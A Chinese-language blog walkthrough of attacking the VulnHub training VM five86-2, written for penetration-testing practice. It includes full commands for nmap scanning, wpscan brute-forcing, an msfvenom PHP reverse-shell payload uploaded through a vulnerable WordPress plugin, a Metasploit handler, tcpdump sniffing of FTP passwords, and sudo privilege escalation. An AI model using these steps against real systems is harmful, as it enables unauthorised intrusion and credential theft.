0%

VulnHub打穿记录之five86-2

这两天感觉web渗透技术手段有点手生,于是在网上找了几台靶机拿来搞一搞。现将five86-2靶机渗透过程记录,five86-2打穿效果图如下:

five86-2获取flag

一、靶机概括

下载下来的five86-2靶机是ova格式的虚拟机,约1.69GB。使用VMware Workstations打开即可。由于我的kali网卡是NAT模式,因此将five86-2靶机的网卡也设置为NAT模式。

二、获取目标主机信息

使用VMware Workstations打开five86-2靶机后,发现靶机需要帐号密码才能登陆(哈哈哈,现在靶机模拟的和现实还挺像的)。靶机网络模式设置的是NAT模式,因此获取主机信息方面就很方便了,只需搜索该网段内的活动主机,就能发现靶机的IP。哈哈,这时候我们的瑞士军刀派上用场,命令如下:

1
root@leyan:~# nmap -sT 192.168.153.1/24

nmap扫面结果

通过nmap发现靶机IP为:192.168.153.175,同时开放了web服务和ftp服务。于是访问192.168.153.175,发现该网站为wordpress,wordpress框架没有什么漏洞,但是wordpress的主题和插件漏洞很多。于是这时候祭出wordpress天敌“wpscan”进行搜索站点的主题和插件。

1
root@leyan:~# wpscan --url http://five86-2/ -e u

wpscan搜索结果

通过wpscan,爆破发现该站点有:admin、Barney Sumner、gillian、peter、stephen五个帐号,于是针对五个帐号进行爆破。

1
root@leyan:~#wpscan --url http://five86-2/ -U user -P '/usr/share/wordlists/rockyou.txt' --wp-content-dir wp-content --no-banner --no-update

爆破结果

在爆破wordpress过程的等待中,对ftp进行工作,这里发现ftp没有可以利用的地方,这里就不赘述,大家可以自行测试,如果找到可利用ftp的方式可以跟小编进行交流。以stephen用户登陆站点后发现,以下插件:

wordpress插件

通过Google发现“Insert or Embed Articulate Content into WordPress Trial”插件存在漏洞。

三、漏洞利用

发现漏洞后,为了方便直接上metaploit的php木马,生成命令如下:

1
root@leyan:~#msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.153.174 lport=4444 -f raw >1.php

木马生成

在wordpress站点新建post,上传木马。

新增post
获取木马shell路径
获取shell路径

配置metaploit,反弹木马shell

1
2
3
4
5
use exploit/multi/handler
set php/meterpreter/reverse_tcp
set lhost 192.168.153.174
set lport 4444
exploit

木马shell
这是时候获取的是www-data的权限,权限比较低,这是时候需要为我们进行提权。首先将获取的shell设置为交互式的。

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

同时呢,前期爆破出来两个账号密码,尝试一下有没有可能也是系统帐号,通过尝试发现“stephen”可以登录,同时其的权限也比较高。查看一下系统进程。

1
ps -auxwww

发现系统运行ftp,由于ftp传输是明文传输,这是时候想到监听系统网卡,分析流量,看看能不能捕捉到ftp的账号密码。

ftp服务

启动ftp的是“paul”帐号,使用“stephen”帐号通过tcpdump获取流量,并下载至本地分析。

1
tcpdump -i br-eca3858d86bf -w ftp.pcap

ftp账户密码

登陆paul用户,发现其可以使用sudo,因此对其提权,并修改root密码

提权

截至到这里,已经拿到系统的最高权限,余下想做什么都可以了。